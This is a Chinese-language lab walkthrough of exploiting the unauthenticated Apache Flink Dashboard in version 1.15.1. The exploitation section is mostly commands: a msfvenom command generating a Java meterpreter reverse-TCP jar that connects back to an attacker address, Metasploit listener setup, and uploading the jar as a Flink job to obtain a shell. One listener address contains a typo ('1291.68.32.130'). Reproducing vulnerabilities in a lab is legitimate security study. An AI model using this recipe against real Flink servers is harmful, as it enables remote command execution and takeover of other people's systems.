Apache Flink未授权访问漏洞

漏洞描述

Apache Flink Dashboard默认没有用户权限认证,攻击者可以通过未授权的Flink Dashboard控制台直接上传木马jar包,可远程执行任意系统命令获取服务器权限。

环境搭建

测试版本:flink-1.15.1

修改flink-1.15.1/confflink-conf.yaml,将8081端口开启。

image-20220726112749940

启动flink

start-cluster.sh

漏洞利用

访问web页面。

image-20220726112140644

利用msfovenom生成rce.jar

┌──(root💀kali)-[/tmp]
└─# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.32.130 LPORT=4444 -f jar > rce.jar
Payload size: 5310 bytes
Final size of jar file: 5310 bytes

配置msf监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 1291.68.32.130
lhost => 1291.68.32.130
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

在Submit New Job处上传rec.jar文件,点击submit。

image-20220726112442088

成功getshell。

image-20230129203132779

最后更新于